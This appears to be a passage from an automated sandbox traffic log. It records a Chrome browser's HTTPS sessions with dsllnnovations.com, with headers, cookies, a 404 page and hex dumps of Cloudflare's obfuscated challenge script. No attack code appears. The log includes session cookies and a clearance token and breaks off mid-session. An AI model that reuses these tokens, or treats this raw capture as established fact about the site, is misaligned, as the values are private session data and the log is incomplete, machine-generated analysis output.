                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                access-control-allow-origin: *
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5oHSbgz0g4fnJf2UsCZnmJZuTGnYNcrjE%2BmZZJXorOnk4BRlG84otQlmXUJGGMjZtMUHvBmBAG7W8Zc6y%2FWzydPGWm5DNGMTRSHkaFx%2FD4DJbc9nyVeACYtaluml67H%2Fzgb1BY%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e830cb912c96-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=2027&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1366&delivery_rate=1371861&cwnd=249&unsent_bytes=0&cid=5fcf9f422de7ef42&ts=152&x=0"


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.461349172.67.148.2124438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:20 UTC1092OUTGET /aith/ HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://dsllnnovations.com/aith/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0
                                                2024-10-29 23:22:21 UTC910INHTTP/1.1 404 Not Found
                                                Date: Tue, 29 Oct 2024 23:22:21 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                X-Content-Type-Options: nosniff
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                X-XSS-Protection: 1; mode=block
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oDusOe7fSJjigxaS2PHB1yTwoqOj7K9ywodW2zoPajEeNvaVqjaPLTfz2Y3eo74gRvJAdSQzfjNUezKDZdVjTnAIm16n1PyEEgwoAoVJ%2BQzGZy0eLZtDBvaP5lcwtHaqtztPvzs%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e8395f456b4c-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1670&delivery_rate=2273155&cwnd=233&unsent_bytes=0&cid=09d289685fba52ab&ts=808&x=0"
                                                2024-10-29 23:22:21 UTC459INData Raw: 34 61 62 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 3c 73 63 72 69 70 74
                                                Data Ascii: 4ab<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><script
                                                2024-10-29 23:22:21 UTC743INData Raw: 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65
                                                Data Ascii: a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createEleme
                                                2024-10-29 23:22:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.461351172.67.148.2124438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:21 UTC806OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f2bbd6738e15/main.js? HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk
                                                2024-10-29 23:22:21 UTC877INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:21 GMT
                                                Content-Type: application/javascript; charset=UTF-8
                                                Content-Length: 8126
                                                Connection: close
                                                cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                x-content-type-options: nosniff
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTbJiMjYJ0%2Ftgech%2FqydLRCmvB06%2BwiMfsUg7KM6F5f0t9cyIoosRHF5Apsovp8VhU%2FefstgSAB%2FleS5A9mJOcxDgilyHe5%2B2qLeliJh5BL10lljyNmeVWriwXGFSGYO6ZkILwo%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e83cfbad3aaa-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1384&delivery_rate=2153159&cwnd=244&unsent_bytes=0&cid=a4f2b8802dbd21ab&ts=150&x=0"
                                                2024-10-29 23:22:21 UTC492INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6e 2c 6f 2c 73 2c 7a 2c 41 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 55 2c 65 2c 66 29 7b 66 6f 72 28 55 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 55 28 34 36 32 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 55 28 34 36 37 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 55 28 34 33 36 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 55 28 34 38 33 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 33 38 31 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 55 28 34 30 31 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 55 28 34 30 39 29 29 2f 37 2a 28 2d 70 61 72 73
                                                Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=parseInt(U(462))/1*(parseInt(U(467))/2)+parseInt(U(436))/3+parseInt(U(483))/4+-parseInt(U(381))/5*(parseInt(U(401))/6)+parseInt(U(409))/7*(-pars
                                                2024-10-29 23:22:21 UTC1369INData Raw: 69 6e 67 5b 61 30 28 34 37 32 29 5d 2c 65 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 44 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 44 3f 27 27 3a 65 2e 67 28 44 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 45 2c 61 31 29 7b 72 65 74 75 72 6e 20 61 31 3d 62 2c 61 31 28 33 38 33 29 5b 61 31 28 33 39 38 29 5d 28 45 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 45 2c 46 2c 61 32 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 54 29 7b 69 66 28 61 32 3d 61 30 2c 6e 75 6c 6c 3d 3d 44 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 48 3d 7b 7d 2c 49 3d 7b 7d 2c 4a 3d 27 27 2c 4b 3d 32 2c 4c 3d 33 2c 4d 3d 32 2c 4e 3d 5b 5d 2c 4f 3d 30 2c 50 3d 30 2c 51 3d 30 3b 51 3c 44 5b 61 32 28 33 39 34 29 5d 3b 51 2b 3d 31 29 69 66 28 52
                                                Data Ascii: ing[a0(472)],e={'h':function(D){return null==D?'':e.g(D,6,function(E,a1){return a1=b,a1(383)[a1(398)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(394)];Q+=1)if(R
                                                2024-10-29 23:22:21 UTC1369INData Raw: 3b 7d 4b 2d 2d 2c 30 3d 3d 4b 26 26 28 4b 3d 4d 61 74 68 5b 61 32 28 34 30 37 29 5d 28 32 2c 4d 29 2c 4d 2b 2b 29 2c 64 65 6c 65 74 65 20 49 5b 4a 5d 7d 65 6c 73 65 20 66 6f 72 28 54 3d 48 5b 4a 5d 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 4f 3c 3c 31 7c 54 26 31 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 32 28 33 39 39 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 4b 2d 2d 2c 30 3d 3d 4b 26 26 4d 2b 2b 7d 66 6f 72 28 54 3d 32 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 4f 3c 3c 31 7c 54 26 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 32 28 33 39 39 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 4f 3c 3c 3d 31 2c 50 3d 3d 45 2d 31 29 7b 4e 5b 61 32 28 33
                                                Data Ascii: ;}K--,0==K&&(K=Math[a2(407)](2,M),M++),delete I[J]}else for(T=H[J],G=0;G<M;O=O<<1|T&1,E-1==P?(P=0,N[a2(399)](F(O)),O=0):P++,T>>=1,G++);K--,0==K&&M++}for(T=2,G=0;G<M;O=O<<1|T&1,P==E-1?(P=0,N[a2(399)](F(O)),O=0):P++,T>>=1,G++);for(;;)if(O<<=1,P==E-1){N[a2(3
                                                2024-10-29 23:22:21 UTC1369INData Raw: 47 5b 54 5d 3b 65 6c 73 65 20 69 66 28 49 3d 3d 3d 54 29 54 3d 4c 2b 4c 5b 61 35 28 33 39 38 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 4b 5b 61 35 28 33 39 39 29 5d 28 54 29 2c 47 5b 49 2b 2b 5d 3d 4c 2b 54 5b 61 35 28 33 39 38 29 5d 28 30 29 2c 48 2d 2d 2c 4c 3d 54 2c 48 3d 3d 30 26 26 28 48 3d 4d 61 74 68 5b 61 35 28 34 30 37 29 5d 28 32 2c 4a 29 2c 4a 2b 2b 29 7d 7d 7d 2c 66 3d 7b 7d 2c 66 5b 61 30 28 34 33 38 29 5d 3d 65 2e 68 2c 66 7d 28 29 2c 6f 3d 7b 7d 2c 6f 5b 56 28 34 33 37 29 5d 3d 27 6f 27 2c 6f 5b 56 28 34 38 32 29 5d 3d 27 73 27 2c 6f 5b 56 28 34 34 34 29 5d 3d 27 75 27 2c 6f 5b 56 28 34 33 30 29 5d 3d 27 7a 27 2c 6f 5b 56 28 34 32 31 29 5d 3d 27 6e 27 2c 6f 5b 56 28 33 38 39 29 5d 3d 27 49 27 2c 6f 5b 56 28 34 32
                                                Data Ascii: G[T];else if(I===T)T=L+L[a5(398)](0);else return null;K[a5(399)](T),G[I++]=L+T[a5(398)](0),H--,L=T,H==0&&(H=Math[a5(407)](2,J),J++)}}},f={},f[a0(438)]=e.h,f}(),o={},o[V(437)]='o',o[V(482)]='s',o[V(444)]='u',o[V(430)]='z',o[V(421)]='n',o[V(389)]='I',o[V(42
                                                2024-10-29 23:22:21 UTC1369INData Raw: 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 61 28 29 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 3d 66 2d 33 37 34 2c 68 3d 65 5b 66 5d 2c 68 7d 2c 62 28 63 2c 64 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 68 29 7b 72 65 74 75 72 6e 20 61 68 3d 27 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 2c 35 59 4a 64 68 74 54 2c 6b 65 79 73 2c 6e 6f 77 2c 31 35 31 30 37 36 32 38 49 66 59 62 66 44 2c 72 65 61 64 79 53 74 61 74 65 2c 34 32 38 34 33 38 67 69 47 69 45 52 2c 63 68 6c 41 70 69 55 72 6c 2c 63 68 6c 41 70 69 41 43 43 48 2c 64 2e 63 6f 6f 6b 69 65 2c 66 72 6f 6d 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 73 70 6c 69 74 2c 63 68 6c 41 70 69 53 69 74 65 6b 65 79 2c 63 68 6c 41 70 69 43 6c 69 65 6e 74 56 65 72 73 69
                                                Data Ascii: ,d,e){return e=a(),b=function(f,g,h){return f=f-374,h=e[f],h},b(c,d)}function a(ah){return ah='onreadystatechange,5YJdhtT,keys,now,15107628IfYbfD,readyState,428438giGiER,chlApiUrl,chlApiACCH,d.cookie,from,fromCharCode,split,chlApiSitekey,chlApiClientVersi
                                                2024-10-29 23:22:21 UTC1369INData Raw: 2c 64 6f 63 75 6d 65 6e 74 2c 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 65 72 72 6f 72 20 6f 6e 20 63 66 5f 63 68 6c 5f 70 72 6f 70 73 2c 6d 61 70 2c 2f 62 65 61 63 6f 6e 2f 6f 76 2c 74 69 6d 65 6f 75 74 2c 61 70 70 65 6e 64 43 68 69 6c 64 2c 63 68 63 74 78 2c 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 2c 63 68 6c 41 70 69 52 75 6d 57 69 64 67 65 74 41 67 65 4d 73 2c 69 6e 64 65 78 4f 66 2c 72 65 70 6c 61 63 65 2c 43 6f 6e 74 65 6e 74 2d 74 79 70 65 2c 73 65 6e 64 2c 63 46 50 57 76 2c 32 30 37 79 48 44 45 52 63 27 2e 73 70 6c 69 74 28 27 2c 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 68 7d 2c 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 63 2c 57 29 7b 72 65 74 75 72 6e 20 57 3d 56 2c
                                                Data Ascii: ,document,Content-Type,error on cf_chl_props,map,/beacon/ov,timeout,appendChild,chctx,/cdn-cgi/challenge-platform/h/,chlApiRumWidgetAgeMs,indexOf,replace,Content-type,send,cFPWv,207yHDERc'.split(','),a=function(){return ah},a()}function j(c,W){return W=V,
                                                2024-10-29 23:22:21 UTC789INData Raw: 7d 2c 46 5b 5a 28 34 31 32 29 5d 3d 44 2c 46 5b 5a 28 34 30 33 29 5d 3d 45 2c 46 29 3b 74 72 79 7b 69 66 28 48 3d 68 5b 5a 28 33 38 35 29 5d 2c 49 3d 5a 28 34 35 33 29 2b 68 5b 5a 28 34 30 32 29 5d 5b 5a 28 34 35 39 29 5d 2b 5a 28 34 34 39 29 2b 31 2b 5a 28 33 37 39 29 2b 48 2e 72 2b 5a 28 33 37 38 29 2c 4a 3d 6e 65 77 20 68 5b 28 5a 28 34 38 35 29 29 5d 28 29 2c 21 4a 29 72 65 74 75 72 6e 3b 4b 3d 5a 28 33 39 36 29 2c 4c 3d 7b 7d 2c 4c 5b 5a 28 34 37 34 29 5d 3d 68 5b 5a 28 34 30 32 29 5d 5b 5a 28 34 37 34 29 5d 2c 4c 5b 5a 28 34 36 38 29 5d 3d 68 5b 5a 28 34 30 32 29 5d 5b 5a 28 34 36 38 29 5d 2c 4c 5b 5a 28 34 35 34 29 5d 3d 68 5b 5a 28 34 30 32 29 5d 5b 5a 28 34 35 34 29 5d 2c 4c 5b 5a 28 34 37 35 29 5d 3d 68 5b 5a 28 34 30 32 29 5d 5b 5a 28 34 36 39
                                                Data Ascii: },F[Z(412)]=D,F[Z(403)]=E,F);try{if(H=h[Z(385)],I=Z(453)+h[Z(402)][Z(459)]+Z(449)+1+Z(379)+H.r+Z(378),J=new h[(Z(485))](),!J)return;K=Z(396),L={},L[Z(474)]=h[Z(402)][Z(474)],L[Z(468)]=h[Z(402)][Z(468)],L[Z(454)]=h[Z(402)][Z(454)],L[Z(475)]=h[Z(402)][Z(469


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.461356172.67.148.2124438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:22 UTC1020OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/8da6e8395f456b4c HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                Content-Length: 15786
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-platform: "Windows"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Content-Type: application/json
                                                Accept: */*
                                                Origin: https://dsllnnovations.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0
                                                2024-10-29 23:22:22 UTC15786OUTData Raw: 7b 22 77 70 22 3a 22 52 67 31 56 76 4e 6a 65 76 6c 31 76 75 79 49 6a 5a 6a 2b 32 78 56 4e 39 32 37 6e 32 69 30 69 72 72 4e 65 6a 4b 36 32 48 43 39 58 43 34 31 32 59 48 47 7a 49 43 6c 6a 41 32 75 5a 31 45 46 67 67 32 37 71 72 32 77 32 72 39 72 31 6a 32 55 72 6a 4f 49 53 56 71 6c 67 57 35 38 56 48 43 70 67 6e 37 33 41 2b 79 45 6d 56 4f 70 76 51 6e 74 6a 33 36 48 71 69 32 76 31 31 44 69 59 4e 57 46 32 2d 45 46 34 4c 57 32 4c 56 79 59 32 4e 51 31 32 69 56 4e 4e 56 70 75 56 69 32 6a 43 32 78 6c 68 32 6a 74 57 32 66 42 65 37 45 67 47 6a 37 71 46 31 32 4e 42 57 32 4e 49 7a 78 32 7a 4e 32 6a 57 55 34 6f 31 38 41 6e 39 4e 45 4e 6a 4c 4f 6e 67 36 76 70 4d 54 4c 48 32 30 56 4e 69 4a 6b 67 32 65 68 67 43 79 34 48 73 55 45 32 7a 54 4c 71 70 30 37 56 32 6f 71 30 34 69
                                                Data Ascii: {"wp":"Rg1VvNjevl1vuyIjZj+2xVN927n2i0irrNejK62HC9XC412YHGzICljA2uZ1EFgg27qr2w2r9r1j2UrjOISVqlgW58VHCpgn73A+yEmVOpvQntj36Hqi2v11DiYNWF2-EF4LW2LVyY2NQ12iVNNVpuVi2jC2xlh2jtW2fBe7EgGj7qF12NBW2NIzx2zN2jWU4o18An9NENjLOng6vpMTLH20VNiJkg2ehgCy4HsUE2zTLqp07V2oq04i
                                                2024-10-29 23:22:23 UTC1320INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:23 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.dsllnnovations.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                Set-Cookie: cf_clearance=Bmcunvpm7ksia8aS.jSilIoycs8FVhcrMUy1sf4WK2s-1730244143-1.2.1.1-5tyVYrhdKmXu0Z.A3iqWSqYdvsrSNCfYSCtQaolgT5JsNU8MenldGi2wbavcQ3CssfR2wGQkxomTVaICQNbUyncwCKTf7joP3BxPOMOtIfeQVJCuh8.JF3LXMBHFSPHGmi_ym_rGsLcHuSsJn6uTJ2Bnnpz8C4.hd8Kp2tXoBAK5QW9cmERE9C9ZlSWhKcXRLrrhqXLef2rLA8Q87wdMbfSng8I48I8Yt9.RrCpFDVrUaJ2DsObJ1nBhKAybmVRPplMs9.affH.OsKAbdemjh7Vw1Dzujk_DUGQ1Xn.Usvo18O6_sWaUnSf.7o82McL4g0Rh7FdeUn8hu4NlfYN7Bm4pyOTI52MdzjLibf9hrzIAGLPRKTCeVRFcPl4Jun8YQ7WLFUwi1uT8Q_xsANeO6g; Path=/; Expires=Wed, 29-Oct-25 23:22:23 GMT; Domain=.dsllnnovations.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQUFBqa7R1IgSs0Mc69YtV5I0RJXcmoovnxclmdzQxu7Zm%2F90QwC8t4dPeZMt5uGI81%2BZ06kUDU4XY%2F8c9nFuRZVUM8JMjKCoOmnbLFAm5a0ujG7OLOE4wOzQsviQuHYGwPF2lc%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e845fb9fe817-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-29 23:22:23 UTC193INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 36 32 26 73 65 6e 74 3d 39 26 72 65 63 76 3d 32 31 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 34 32 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 36 33 30 33 33 36 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 38 31 65 62 61 38 36 31 61 33 32 39 62 37 64 26 74 73 3d 32 36 36 26 78 3d 30 22 0d 0a 0d 0a
                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1162&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2849&recv_bytes=17428&delivery_rate=2630336&cwnd=251&unsent_bytes=0&cid=c81eba861a329b7d&ts=266&x=0"


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.461355104.21.63.1724438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:22 UTC802OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f2bbd6738e15/main.js? HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0
                                                2024-10-29 23:22:23 UTC873INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:23 GMT
                                                Content-Type: application/javascript; charset=UTF-8
                                                Content-Length: 8126
                                                Connection: close
                                                cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                x-content-type-options: nosniff
